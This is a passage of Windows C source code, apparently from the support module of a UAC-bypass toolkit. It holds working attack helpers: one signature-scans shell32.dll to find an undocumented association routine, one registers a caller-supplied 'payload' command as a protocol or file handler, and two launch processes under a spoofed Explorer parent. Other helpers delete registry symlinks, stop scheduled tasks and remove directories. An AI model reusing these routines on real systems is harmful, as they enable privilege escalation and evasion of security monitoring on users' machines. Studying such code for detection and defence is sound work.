    ntStatus = NtOpenKey(&rootKeyHandle, MAXIMUM_ALLOWED, &obja);
    if (!NT_SUCCESS(ntStatus)) {
        //
        // Only free the path if we allocated it ourselves; a caller-supplied
        // UserRegEntry buffer is not ours to release.
        //
        if (UserRegEntry == NULL)
            RtlFreeUnicodeString(&usRootKey);
        return ntStatus;
    }

    RtlInitUnicodeString(&usKeyName, T_SOFTWARE_CLASSES);
    obja.ObjectName = &usKeyName;
    obja.RootDirectory = rootKeyHandle;

    ntStatus = NtCreateKey(&keyHandle,
        MAXIMUM_ALLOWED,
        &obja,
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        &dummy);

    if (NT_SUCCESS(ntStatus))
        *KeyHandle = keyHandle;

    NtClose(rootKeyHandle);

    if (UserRegEntry == NULL)
        RtlFreeUnicodeString(&usRootKey);

    return ntStatus;
}

/*
* supRemoveRegLinkHKCU
*
* Purpose:
*
* Remove registry symlink for current user.
*
*/
NTSTATUS supRemoveRegLinkHKCU(
    _In_ LPWSTR lpszRegLink
)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    ULONG cbKureND;
    UNICODE_STRING usCurrentUser, usLinkPath;
    OBJECT_ATTRIBUTES obja;
    UNICODE_STRING CmSymbolicLinkValue = RTL_CONSTANT_STRING(L"SymbolicLinkValue");
    PWSTR lpLinkKeyBuffer = NULL;
    SIZE_T memIO;
    HANDLE hKey = NULL;

    cbKureND = (ULONG)(_strlen(lpszRegLink)) * sizeof(WCHAR);

    InitializeObjectAttributes(&obja, &usLinkPath, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = RtlFormatCurrentUserKeyPath(&usCurrentUser);
    if (!NT_SUCCESS(status))
        return status;

    do {
        memIO = sizeof(UNICODE_NULL) + usCurrentUser.MaximumLength + cbKureND;
        lpLinkKeyBuffer = (PWSTR)supHeapAlloc(memIO);
        if (lpLinkKeyBuffer == NULL)
            break;

        usLinkPath.Buffer = lpLinkKeyBuffer;
        usLinkPath.Length = 0;
        usLinkPath.MaximumLength = (USHORT)memIO;

        status = RtlAppendUnicodeStringToString(&usLinkPath, &usCurrentUser);
        if (!NT_SUCCESS(status))
            break;

        status = RtlAppendUnicodeToString(&usLinkPath, lpszRegLink);
        if (!NT_SUCCESS(status))
            break;

        //
        // OBJ_OPENLINK opens the link key itself instead of following it.
        //
        InitializeObjectAttributes(&obja, &usLinkPath, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, NULL, NULL);

        status = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obja);
        if (NT_SUCCESS(status)) {
            status = NtDeleteValueKey(hKey, &CmSymbolicLinkValue);
            if (NT_SUCCESS(status))
                status = NtDeleteKey(hKey);
            NtClose(hKey);
        }

    } while (FALSE);

    if (lpLinkKeyBuffer) supHeapFree(lpLinkKeyBuffer);
    RtlFreeUnicodeString(&usCurrentUser);

    return status;
}

/*
* supFindPattern
*
* Purpose:
*
* Lookup pattern in buffer.
*
*/
PVOID supFindPattern(
    _In_ CONST PBYTE Buffer,
    _In_ SIZE_T BufferSize,
    _In_ CONST PBYTE Pattern,
    _In_ SIZE_T PatternSize
)
{
    PBYTE p0 = Buffer, pnext;

    if (PatternSize == 0)
        return NULL;
    if (BufferSize < PatternSize)
        return NULL;

    do {
        pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);
        if (pnext == NULL)
            break;

        BufferSize -= (ULONG_PTR)(pnext - p0);

        if (BufferSize < PatternSize)
            return NULL;

        if (memcmp(pnext, Pattern, PatternSize) == 0)
            return pnext;

        p0 = pnext + 1;
        --BufferSize;

    } while (BufferSize > 0);

    return NULL;
}

/*
* supLookupImageSectionByName
*
* Purpose:
*
* Lookup section pointer and size for section name.
*
*/
PVOID supLookupImageSectionByName(
    _In_ CHAR* SectionName,
    _In_ ULONG SectionNameLength,
    _In_ PVOID DllBase,
    _Out_ PULONG SectionSize
)
{
    BOOLEAN bFound = FALSE;
    ULONG i;
    PVOID Section;
    IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(DllBase);
    IMAGE_SECTION_HEADER* SectionTableEntry;

    //
    // Assume failure.
    //
    if (SectionSize)
        *SectionSize = 0;

    if (NtHeaders == NULL)
        return NULL;

    SectionTableEntry = (PIMAGE_SECTION_HEADER)((PCHAR)NtHeaders +
        sizeof(ULONG) +
        sizeof(IMAGE_FILE_HEADER) +
        NtHeaders->FileHeader.SizeOfOptionalHeader);

    //
    // Locate section.
    //
    i = NtHeaders->FileHeader.NumberOfSections;
    while (i > 0) {

        if (_strncmp_a(
            (CHAR*)SectionTableEntry->Name,
            SectionName,
            SectionNameLength) == 0)
        {
            bFound = TRUE;
            break;
        }

        i -= 1;
        SectionTableEntry += 1;
    }

    //
    // Section not found, abort scan.
    //
    if (!bFound)
        return NULL;

    Section = (PVOID)((ULONG_PTR)DllBase + SectionTableEntry->VirtualAddress);
    if (SectionSize)
        *SectionSize = SectionTableEntry->Misc.VirtualSize;

    return Section;
}

/*
* supGetUserAssocSetDB
*
* Purpose:
*
* Return pointer to UAS table and optionally count of entries.
*
*/
PUSER_ASSOC_SIGNATURE supGetUserAssocSetDB(
    _Out_opt_ PULONG SignatureCount
)
{
    if (SignatureCount)
        *SignatureCount = RTL_NUMBER_OF(g_UserAssocSignatures);

    return (PUSER_ASSOC_SIGNATURE)&g_UserAssocSignatures;
}

/*
* supEnumUserAssocSetDB
*
* Purpose:
*
* Enumerate UserSetAssocDB.
*
*/
VOID supEnumUserAssocSetDB(
    _In_ PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION Callback,
    _In_opt_ PVOID Context
)
{
    USER_ASSOC_SIGNATURE* pSignature;
    ULONG i, signCount;
    BOOLEAN bStopEnumeration;

    bStopEnumeration = FALSE;
    signCount = RTL_NUMBER_OF(g_UserAssocSignatures);

    //
    // Iterate through signatures table.
    //
    for (i = 0; i < signCount; i++) {
        pSignature = g_UserAssocSignatures[i];
        Callback(pSignature, Context, &bStopEnumeration);
        if (bStopEnumeration)
            break;
    }
}

/*
* supFindUserAssocSet
*
* Purpose:
*
* Locate internal shell routine.
*
*/
NTSTATUS supFindUserAssocSet(
    _Out_ USER_ASSOC_PTR* Function
)
{
    HANDLE hModule;
    PBYTE ptrCode;
    PVOID sectionBase, patternPtr, funcPtr;
    ULONG i, j, signCount;
    ULONG sectionSize = 0, patternSize = 0;
    LONG rel = 0;
    hde64s hs;
    WCHAR szBuffer[MAX_PATH * 2];
    USER_ASSOC_SIGNATURE* pSignature;
    USER_ASSOC_PATTERN* pPattern;
    PVOID* pTable;

    Function->UserAssocSet = NULL;
    Function->Valid = FALSE;

    //
    // Preload shell32.dll
    //
    hModule = (HMODULE)GetModuleHandle(SHELL32_DLL);
    if (hModule == NULL) {
        _strcpy(szBuffer, g_ctx->szSystemDirectory);
        _strcat(szBuffer, SHELL32_DLL);
        hModule = (HANDLE)LoadLibraryEx(szBuffer, NULL, 0);
    }

    if (hModule == NULL)
        return STATUS_DLL_NOT_FOUND;

    //
    // Find text section and remember its boundaries.
    //
    sectionBase = supLookupImageSectionByName(TEXT_SECTION,
        TEXT_SECTION_LEGNTH,
        (PVOID)hModule,
        &sectionSize);

    if (sectionBase == NULL || sectionSize == 0)
        return STATUS_INVALID_ADDRESS;

    ptrCode = NULL;
    signCount = RTL_NUMBER_OF(g_UserAssocSignatures);

    //
    // Iterate through signatures table and try each one for corresponding nt build.
    //
    for (i = 0; i < signCount; i++) {

        pSignature = g_UserAssocSignatures[i];

        //
        // If the Windows build falls into the signature's range, use its patterns.
        //
        if (g_ctx->dwBuildNumber >= pSignature->NtBuildMin &&
            g_ctx->dwBuildNumber <= pSignature->NtBuildMax)
        {
            pTable = pSignature->PatternsTable;

            //
            // Try all available patterns.
            //
            for (j = 0; j < pSignature->PatternsCount; j++) {

                pPattern = pTable[j];
                patternPtr = pPattern->Ptr;
                patternSize = pPattern->Size;

                //
                // Lookup signature.
                //
                ptrCode = (PBYTE)supFindPattern(sectionBase,
                    sectionSize,
                    patternPtr,
                    patternSize);

                if (ptrCode) {
                    //
                    // Pointer within section.
                    //
                    if (IN_REGION(ptrCode, sectionBase, sectionSize)) {
                        break;
                    }
                    else {
                        ptrCode = NULL;
                    }
                }
            }

            if (ptrCode)
                break;
        }
    }

    if (ptrCode == NULL || patternSize == 0)
        return STATUS_NOT_FOUND;

    //
    // Skip signature bytes.
    //
    ptrCode = (PBYTE)RtlOffsetToPointer(ptrCode, patternSize);

    //
    // Disassemble the instruction that follows the signature and verify
    // it is a 5-byte near relative call (E8 rel32).
    //
    hde64_disasm(ptrCode, &hs);
    if (hs.flags & F_ERROR)
        return STATUS_INTERNAL_ERROR;

    if ((hs.len != 5) || (ptrCode[0] != 0xE8)) //call rel32
        return STATUS_BAD_DATA;

    rel = *(PLONG)(ptrCode + 1);
    funcPtr = ptrCode + hs.len + rel;

    if (IN_REGION(funcPtr, sectionBase, sectionSize)) {
        Function->UserAssocSet = (pfnUserAssocSet)funcPtr;
        Function->Valid = TRUE;
        return STATUS_SUCCESS;
    }
    else {
        return STATUS_CONFLICTING_ADDRESSES;
    }
}

/*
* supRegisterShellAssoc
*
* Purpose:
*
* Set and register shell protocol.
*
*/
NTSTATUS supRegisterShellAssoc(
    _In_ LPCWSTR pszExt,
    _In_ LPCWSTR pszProgId,
    _In_ USER_ASSOC_PTR* UserAssocFunc,
    _In_ LPCWSTR lpszPayload,
    _In_ BOOL fCustomURIScheme,
    _In_opt_ LPCWSTR pszDefaultValue
)
{
    HANDLE classesKey = NULL, protoKey = NULL, assocKey = NULL;
    NTSTATUS ntStatus;
    SIZE_T sz;
    HRESULT hr = E_FAIL;
    WCHAR szBuffer[MAX_PATH];

    if (UserAssocFunc == NULL)
        return STATUS_INVALID_PARAMETER_3;
    if (UserAssocFunc->Valid == FALSE)
        return STATUS_INVALID_PARAMETER_3;
    if (lpszPayload == NULL)
        return STATUS_INVALID_PARAMETER_4;

    ntStatus = supOpenClassesKey(NULL, &classesKey);
    if (!NT_SUCCESS(ntStatus))
        return ntStatus;

    //
    // Write custom pluggable protocol handler mark.
    //
    if (fCustomURIScheme) {
        if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,
            pszExt,
            0,
            NULL,
            REG_OPTION_NON_VOLATILE,
            KEY_SET_VALUE,
            NULL,
            (HKEY*)&protoKey,
            NULL))
        {
            RegSetValueEx(protoKey, T_URL_PROTOCOL, 0, REG_SZ, NULL, 0);

            if (pszDefaultValue) {
                sz = (_strlen(pszDefaultValue) + 1) * sizeof(WCHAR);
                RegSetValueEx(protoKey, TEXT(""), 0, REG_SZ, (BYTE*)pszDefaultValue, (DWORD)sz);
            }

            RegCloseKey(protoKey);
        }
    }

    //
    // Create protocol registry entry.
    //
    _strcpy(szBuffer, pszProgId);
    _strcat(szBuffer, T_SHELL_OPEN);
    _strcat(szBuffer, TEXT("\\"));
    _strcat(szBuffer, T_SHELL_COMMAND);

    if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,
        szBuffer,
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        MAXIMUM_ALLOWED,
        NULL,
        (HKEY*)&assocKey,
        NULL))
    {
        sz = (_strlen(lpszPayload) + 1) * sizeof(WCHAR);
        if (ERROR_SUCCESS == RegSetValueEx(assocKey, TEXT(""), 0, REG_SZ, (BYTE*)lpszPayload, (DWORD)sz)) {
            ntStatus = STATUS_SUCCESS;
        }
        else {
            ntStatus = STATUS_REGISTRY_IO_FAILED;
        }
        RegCloseKey(assocKey);
    }
    else {
        ntStatus = STATUS_REGISTRY_IO_FAILED;
    }

    NtClose(classesKey);

    if (!NT_SUCCESS(ntStatus))
        return ntStatus;

    ntStatus = STATUS_UNSUCCESSFUL;

    //
    // Register protocol within the shell.
    //
    if (g_ctx->dwBuildNumber > NT_WIN10_20H2) {
        hr = UserAssocFunc->UserAssocSet2(UASET_PROGID, pszExt, pszProgId, 2);
    }
    else {
        switch (g_ctx->dwBuildNumber) {
        case NT_WIN10_19H1:
        case NT_WIN10_19H2:
        case NT_WIN10_REDSTONE5:
            hr = UserAssocFunc->UserAssocSet2(UASET_PROGID, pszExt, pszProgId, 2);
            break;
        default:
            hr = UserAssocFunc->UserAssocSet(UASET_PROGID, pszExt, pszProgId);
            break;
        }
    }

    if (SUCCEEDED(hr)) {
        ntStatus = STATUS_SUCCESS;
    }
    else if (hr == E_ACCESSDENIED) {
        ntStatus = STATUS_ACCESS_DENIED;
    }

    return ntStatus;
}

/*
* supUnregisterShellAssocEx
*
* Purpose:
*
* Unregister and optionally remove shell protocol.
*
*/
NTSTATUS supUnregisterShellAssocEx(
    _In_ BOOLEAN fResetOnly,
    _In_ LPCWSTR pszExt,
    _In_opt_ LPCWSTR pszProgId,
    _In_ USER_ASSOC_PTR* UserAssocFunc
)
{
    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
    HANDLE classesKey = NULL;
    HRESULT hr;

    //
    // UserAssocFunc is the fourth parameter of this routine.
    //
    if (UserAssocFunc == NULL)
        return STATUS_INVALID_PARAMETER_4;
    if (UserAssocFunc->Valid == FALSE)
        return STATUS_INVALID_PARAMETER_4;

    if (fResetOnly == FALSE) {
        ntStatus = supOpenClassesKey(NULL, &classesKey);
        if (!NT_SUCCESS(ntStatus))
            return ntStatus;
    }

    switch (g_ctx->dwBuildNumber) {
    case NT_WIN10_19H1:
    case NT_WIN10_19H2:
        hr = UserAssocFunc->UserAssocSet2(UASET_CLEAR, pszExt, NULL, 0);
        break;
    default:
        hr = UserAssocFunc->UserAssocSet(UASET_CLEAR, pszExt, NULL);
        break;
    }

    if (SUCCEEDED(hr))
        ntStatus = STATUS_SUCCESS;

    if (fResetOnly == FALSE) {
        if (pszProgId)
            supRegDeleteKeyRecursive(classesKey, pszProgId);
        supRegDeleteKeyRecursive(classesKey, pszExt);
        NtClose(classesKey);
    }

    return ntStatus;
}

/*
* supUnregisterShellAssoc
*
* Purpose:
*
* Unregister and remove shell protocol.
*
*/
NTSTATUS supUnregisterShellAssoc(
    _In_ LPCWSTR pszExt,
    _In_ LPCWSTR pszProgId,
    _In_ USER_ASSOC_PTR* UserAssocFunc
)
{
    return supUnregisterShellAssocEx(FALSE, pszExt, pszProgId, UserAssocFunc);
}

/*
* supResetShellAssoc
*
* Purpose:
*
* Clear shell protocol association without removing its registry entries.
*
*/
NTSTATUS supResetShellAssoc(
    _In_ LPCWSTR pszExt,
    _In_opt_ LPCWSTR pszProgId,
    _In_ USER_ASSOC_PTR* UserAssocFunc
)
{
    return supUnregisterShellAssocEx(TRUE, pszExt, pszProgId, UserAssocFunc);
}

/*
* supStopTaskByName
*
* Purpose:
*
* Stop scheduled task by name.
*
*/
BOOL supStopTaskByName(
    _In_ LPCWSTR TaskFolder,
    _In_ LPCWSTR TaskName
)
{
    BOOL bResult = FALSE;
    HRESULT hr;
    ITaskService* pService = NULL;
    ITaskFolder* pRootFolder = NULL;
    IRegisteredTask* pTask = NULL;
    TASK_STATE taskState;
    BSTR bstrTaskFolder = NULL;
    BSTR bstrTask = NULL;
    VARIANT varDummy;

    do {
        bstrTaskFolder = SysAllocString(TaskFolder);
        if (bstrTaskFolder == NULL)
            break;

        bstrTask = SysAllocString(TaskName);
        if (bstrTask == NULL)
            break;

        hr = CoCreateInstance(&CLSID_TaskScheduler,
            NULL,
            CLSCTX_INPROC_SERVER,
            &IID_ITaskService,
            (void**)&pService);

        if (FAILED(hr))
            break;

        VariantInit(&varDummy);

        hr = pService->lpVtbl->Connect(pService, varDummy, varDummy, varDummy, varDummy);
        if (FAILED(hr))
            break;

        hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);
        if (FAILED(hr))
            break;

        hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);
        if (FAILED(hr))
            break;

        hr = pTask->lpVtbl->get_State(pTask, &taskState);
        if (FAILED(hr))
            break;

        if (taskState == TASK_STATE_RUNNING) {
            hr = pTask->lpVtbl->Stop(pTask, 0);
        }

        bResult = SUCCEEDED(hr);

    } while (FALSE);

    if (bstrTaskFolder) SysFreeString(bstrTaskFolder);
    if (bstrTask) SysFreeString(bstrTask);
    if (pTask) pTask->lpVtbl->Release(pTask);
    if (pRootFolder) pRootFolder->lpVtbl->Release(pRootFolder);
    if (pService) pService->lpVtbl->Release(pService);

    return bResult;
}

/*
* supPathAddBackSlash
*
* Purpose:
*
* Add trailing backslash to the path if it doesn't have one.
*
*/
LPWSTR supPathAddBackSlash(
    _In_ LPWSTR lpszPath
)
{
    SIZE_T nLength;
    LPWSTR lpszEnd, lpszPrev, lpszResult = NULL;

    nLength = _strlen(lpszPath);

    if (nLength) {

        lpszEnd = lpszPath + nLength;
        if (lpszPath == lpszEnd)
            lpszPrev = lpszPath;
        else
            lpszPrev = (LPWSTR)lpszEnd - 1;

        if (*lpszPrev != TEXT('\\')) {
            *lpszEnd++ = TEXT('\\');
            *lpszEnd = TEXT('\0');
        }

        lpszResult = lpszEnd;
    }

    return lpszResult;
}

/*
* supOpenShellProcess
*
* Purpose:
*
* Return handle to shell process.
*
*/
HANDLE supOpenShellProcess(
    _In_ ULONG dwDesiredAccess
)
{
    HWND hwndShell = GetShellWindow();
    ULONG processId = 0, desiredAccess = dwDesiredAccess;

    GetWindowThreadProcessId(hwndShell, &processId);
    if (processId) {
        if (!(desiredAccess & PROCESS_CREATE_PROCESS))
            desiredAccess |= PROCESS_CREATE_PROCESS;

        return OpenProcess(desiredAccess, FALSE, processId);
    }

    return NULL;
}

/*
* supRunProcessFromParent
*
* Purpose:
*
* Start new process with given parent.
*
*/
HANDLE supRunProcessFromParent(
    _In_ HANDLE hParentProcess,
    _Inout_opt_ LPWSTR lpApplicationName,
    _In_ LPWSTR lpszParameters,
    _In_opt_ LPWSTR lpCurrentDirectory,
    _In_ ULONG CreationFlags,
    _In_ WORD ShowWindowFlags,
    _Out_opt_ HANDLE* PrimaryThread
)
{
    BOOL bResult = FALSE;
    DWORD dwFlags = CreationFlags | CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS;
    HANDLE hNewProcess = NULL;
    LPWSTR pszBuffer = NULL;
    SIZE_T size;
    STARTUPINFOEX si;
    PROCESS_INFORMATION pi;

    if (PrimaryThread)
        *PrimaryThread = NULL;

    RtlSecureZeroMemory(&pi, sizeof(pi));
    RtlSecureZeroMemory(&si, sizeof(si));

    size = (1 + _strlen(lpszParameters)) * sizeof(WCHAR);
    pszBuffer = (LPWSTR)supHeapAlloc(size);
    if (pszBuffer) {

        _strcpy(pszBuffer, lpszParameters);

        si.StartupInfo.cb = sizeof(STARTUPINFOEX);
        size = 0x30;

        do {
            if (size > 1024)
                break;

            si.lpAttributeList = supHeapAlloc(size);
            if (si.lpAttributeList) {

                if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {
                    if (UpdateProcThreadAttribute(si.lpAttributeList, 0,
                        PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                        &hParentProcess, sizeof(hParentProcess), 0, 0))
                    {
                        si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
                        si.StartupInfo.wShowWindow = ShowWindowFlags;

                        bResult = CreateProcess(lpApplicationName,
                            pszBuffer,
                            NULL,
                            NULL,
                            FALSE,
                            dwFlags | EXTENDED_STARTUPINFO_PRESENT,
                            NULL,
                            lpCurrentDirectory,
                            (LPSTARTUPINFO)&si,
                            &pi);

                        if (bResult) {
                            hNewProcess = pi.hProcess;
                            if (PrimaryThread) {
                                *PrimaryThread = pi.hThread;
                            }
                            else {
                                CloseHandle(pi.hThread);
                            }
                        }
                    }

                    if (si.lpAttributeList)
                        DeleteProcThreadAttributeList(si.lpAttributeList); //dumb empty routine

                }
                supHeapFree(si.lpAttributeList);
            }

        } while (GetLastError() == ERROR_INSUFFICIENT_BUFFER);

        supHeapFree(pszBuffer);
    }

    return hNewProcess;
}

/*
* supCreateBindingHandle
*
* Purpose:
*
* Bind handle to the RPC interface.
*
*/
RPC_STATUS supCreateBindingHandle(
    _In_ RPC_WSTR RpcInterfaceUuid,
    _Out_ RPC_BINDING_HANDLE* BindingHandle
)
{
    RPC_STATUS status = RPC_S_INTERNAL_ERROR;
    RPC_SECURITY_QOS_V3 sqos;
    RPC_WSTR StringBinding = NULL;
    RPC_BINDING_HANDLE Binding = NULL;
    PSID LocalSystemSid = NULL;
    DWORD cbSid = SECURITY_MAX_SID_SIZE;

    if (BindingHandle)
        *BindingHandle = NULL;

    RtlSecureZeroMemory(&sqos, sizeof(sqos));

    status = RpcStringBindingComposeW(RpcInterfaceUuid,
        TEXT("ncalrpc"),
        NULL,
        NULL,
        NULL,
        &StringBinding);

    if (status == RPC_S_OK) {

        status = RpcBindingFromStringBindingW(StringBinding, &Binding);
        RpcStringFreeW(&StringBinding);

        if (status == RPC_S_OK) {

            LocalSystemSid = LocalAlloc(LPTR, cbSid);
            if (LocalSystemSid) {

                if (CreateWellKnownSid(WinLocalSystemSid, NULL, LocalSystemSid, &cbSid)) {

                    //
                    // Require mutual authentication against the LocalSystem SID
                    // so the binding cannot be satisfied by a spoofed endpoint.
                    //
                    sqos.Version = 3;
                    sqos.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
                    sqos.Capabilities = RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH;
                    sqos.IdentityTracking = 0;
                    sqos.Sid = LocalSystemSid;

                    status = RpcBindingSetAuthInfoExW(Binding,
                        NULL,
                        RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
                        RPC_C_AUTHN_WINNT,
                        0,
                        0,
                        (RPC_SECURITY_QOS*)&sqos);

                    if (status == RPC_S_OK) {
                        *BindingHandle = Binding;
                        Binding = NULL;
                    }
                }
                else {
                    status = GetLastError();
                }

                LocalFree(LocalSystemSid);
            }
            else
            {
                status = ERROR_NOT_ENOUGH_MEMORY;
            }
        }
    }

    if (Binding)
        RpcBindingFree(&Binding);

    return status;
}

/*
* supConcatenatePaths
*
* Purpose:
*
* Concatenate 2 paths.
*
*/
BOOL supConcatenatePaths(
    _Inout_ LPWSTR Target,
    _In_ LPCWSTR Path,
    _In_ SIZE_T TargetBufferSize
)
{
    SIZE_T TargetLength, PathLength;
    BOOL NeedSeparator;
    SIZE_T EndingLength;
    SIZE_T i;

    if (Target == NULL || Path == NULL || TargetBufferSize == 0)
        return FALSE;

    // Find current target length.
    TargetLength = 0;
    while (TargetLength < TargetBufferSize && Target[TargetLength] != 0)
        TargetLength++;

    if (TargetLength >= TargetBufferSize)
        return FALSE;

    // Strip trailing backslash from target, but preserve a lone backslash.
    if (TargetLength > 0 && Target[TargetLength - 1] == TEXT('\\')) {
        // Do not strip if the target is exactly a single backslash.
        if (!(TargetLength == 1 && Target[0] == TEXT('\\'))) {
            TargetLength--;
        }
    }

    // Strip leading backslash from path only if target is non-empty.
    if (TargetLength > 0 && Path[0] == TEXT('\\'))
        Path++;

    // Find path length (after possible stripping).
    PathLength = 0;
    while (Path[PathLength] != 0)
        PathLength++;

    // Determine if a separator is needed based on target's last character.
    NeedSeparator = (TargetLength > 0 && Target[TargetLength - 1] != TEXT('\\'));

    EndingLength = TargetLength + (NeedSeparator ? 1 : 0) + PathLength + 1;
    if (EndingLength > TargetBufferSize)
        return FALSE;

    // Insert separator if needed.
    if (NeedSeparator) {
        Target[TargetLength] = TEXT('\\');
        TargetLength++;
    }

    // Copy the path.
    for (i = 0; i < PathLength; i++)
        Target[TargetLength + i] = Path[i];

    Target[TargetLength + PathLength] = 0;

    return TRUE;
}

/*
* supRemoveDirectoryRecursive
*
* Purpose:
*
* Recursively deletes the specified directory and all the files in it.
*
*/
BOOL supRemoveDirectoryRecursive(
    _In_ LPCWSTR Path
)
{
    BOOL bFind = TRUE;
    BOOL Ret = TRUE;
    DWORD dwAttributes;
    HANDLE hFind;
    WCHAR szTemp[MAX_PATH + 1];
    WCHAR FindPath[MAX_PATH + 1];
    WIN32_FIND_DATA FindFileData;

    _strncpy(FindPath, MAX_PATH, Path, MAX_PATH);

    //
    // INVALID_FILE_ATTRIBUTES has the directory bit set, so test for it explicitly.
    //
    dwAttributes = GetFileAttributes(Path);
    if (dwAttributes != INVALID_FILE_ATTRIBUTES &&
        (dwAttributes & FILE_ATTRIBUTE_DIRECTORY))
    {
        supConcatenatePaths(FindPath, TEXT("*.*"), MAX_PATH);
    }

    hFind = FindFirstFile(FindPath, &FindFileData);
    while (hFind != INVALID_HANDLE_VALUE && bFind != FALSE) {

        _strncpy(szTemp, MAX_PATH, Path, MAX_PATH);
        supConcatenatePaths(szTemp, FindFileData.cFileName, MAX_PATH);

        //
        // This is a directory, recurse into it.
        //
        if ((FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&
            (FindFileData.cFileName[0] != TEXT('.')))
        {
            if (!supRemoveDirectoryRecursive(szTemp)) {
                Ret = FALSE;
            }
            RemoveDirectory(szTemp);
        }
        //
        // Remove file.
        //
        else if (!(FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) {
            DeleteFile(szTemp);
        }

        bFind = FindNextFile(hFind, &FindFileData);
    }

    if (hFind != INVALID_HANDLE_VALUE)
        FindClose(hFind);

    //
    // Remove the root directory.
    //
    dwAttributes = GetFileAttributes(Path);
    if (dwAttributes != INVALID_FILE_ATTRIBUTES &&
        (dwAttributes & FILE_ATTRIBUTE_DIRECTORY))
    {
        if (!RemoveDirectory(Path)) {
            Ret = FALSE;
        }
    }

    return Ret;
}

/*
* supEnumProcessesForSession
*
* Purpose:
*
* Enumerate running processes in given session and run callback.
*
*/
BOOL supEnumProcessesForSession(
    _In_ ULONG SessionId,
    _In_ pfnEnumProcessCallback Callback,
    _In_opt_ PVOID UserContext
)
{
    BOOL bStopEnumeration = FALSE;
    ULONG nextEntryDelta = 0;
    PVOID processList;

    union {
        PSYSTEM_PROCESS_INFORMATION Processes;
        PBYTE ListRef;
    } List;

    processList = supGetSystemInfo(SystemProcessInformation);
    if (processList) {

        List.ListRef = (PBYTE)processList;

        do {
            List.ListRef += nextEntryDelta;

            if (List.Processes->SessionId == SessionId) {
                bStopEnumeration = Callback(List.Processes, UserContext);
                if (bStopEnumeration)
                    break;
            }

            nextEntryDelta = List.Processes->NextEntryDelta;
        } while (nextEntryDelta);

        supHeapFree(processList);
    }

    return bStopEnumeration;
}

/*
* supEnableToastForProtocol
*
* Purpose:
*
* Enumerate ProgIDs registered for the given protocol and enable/disable toast notifications for them.
*
*/
VOID supEnableToastForProtocol(
    _In_ LPCWSTR lpProtocol,
    _In_ BOOL fEnable
)
{
    HRESULT hr;
    DWORD celtFetched, dwValue;
    SIZE_T cbName;
    LPWSTR lpProgId, lpValue;
    IAssocHandler* assocHandler;
    IEnumAssocHandlers* enumHandlers = NULL;
    IObjectWithProgID* progId = NULL;

    if (FAILED(SHAssocEnumHandlersForProtocolByApplication(lpProtocol,
        &IID_IEnumAssocHandlers,
        (PVOID*)&enumHandlers)))
    {
        return;
    }

    do {
        celtFetched = 0;
        assocHandler = NULL;

        hr = enumHandlers->lpVtbl->Next(enumHandlers, 1, &assocHandler, &celtFetched);
        if (SUCCEEDED(hr) && celtFetched) {

            hr = assocHandler->lpVtbl->QueryInterface(assocHandler,
                &IID_IObjectWithProgID,
                (PVOID*)&progId);

            if (SUCCEEDED(hr)) {

                lpProgId = NULL;
                hr = progId->lpVtbl->GetProgID(progId, &lpProgId);
                if (SUCCEEDED(hr) && lpProgId) {

                    //
                    // Value name has the form "<ProgId>_<protocol>".
                    //
                    cbName = (4 + _strlen(lpProtocol) + _strlen(lpProgId) + 1) * sizeof(WCHAR);
                    lpValue = (LPWSTR)supHeapAlloc(cbName);
                    if (lpValue) {
                        _strcpy(lpValue, lpProgId);
                        _strcat(lpValue, TEXT("_"));
                        _strcat(lpValue, lpProtocol);

                        dwValue = fEnable;
                        RegSetKeyValue(HKEY_CURRENT_USER,
                            T_APP_ASSOC_TOASTS,
                            lpValue,
                            REG_DWORD,
                            (LPCVOID)&dwValue,
                            sizeof(DWORD));

                        supHeapFree(lpValue);
                    }

                    CoTaskMemFree(lpProgId);
                }
                progId->lpVtbl->Release(progId);
            }
            assocHandler->lpVtbl->Release(assocHandler);
        }
    } while (celtFetched);

    enumHandlers->lpVtbl->Release(enumHandlers);
}

/*
* supWaitForChildProcesses
*
* Purpose:
*
* Check whether child instances of the process with the given name are still running and wait for them for a limited time.
*
*/
ULONG supWaitForChildProcesses(
    _In_ LPCWSTR lpProcessName,
    _In_ DWORD dwWaitMiliseconds
)
{
    BOOL bRetry;
    DWORD dwCreatorPid, dwSessionId, dummy, dwCurrentWait, dwMaxWait = dwWaitMiliseconds;
    PROCESS_BASIC_INFORMATION pbi;
    ULONG nextEntryDelta;
    PVOID processList;
    HANDLE hEnumProcess;
    OBJECT_ATTRIBUTES obja;
    CLIENT_ID cid;
    UNICODE_STRING lookupPsName;
    union {
        PSYSTEM_PROCESS_INFORMATION Processes;
        PBYTE ListRef;
    } List;

    dwCreatorPid = HandleToULong(NtCurrentTeb()->ClientId.UniqueProcess);
    dwSessionId = NtCurrentPeb()->SessionId;
    dwCurrentWait = 0;

    // Always wait at least one polling interval.
    if (dwMaxWait < 1000)
        dwMaxWait = 1000;

    RtlSecureZeroMemory(&pbi, sizeof(pbi));
    RtlInitUnicodeString(&lookupPsName, lpProcessName);
    InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);

    do {
        bRetry = FALSE;

        processList = supGetSystemInfo(SystemProcessInformation);
        if (processList) {
            List.ListRef = (PBYTE)processList;
            nextEntryDelta = 0;
            do {
                List.ListRef += nextEntryDelta;
                if (List.Processes->SessionId == dwSessionId &&
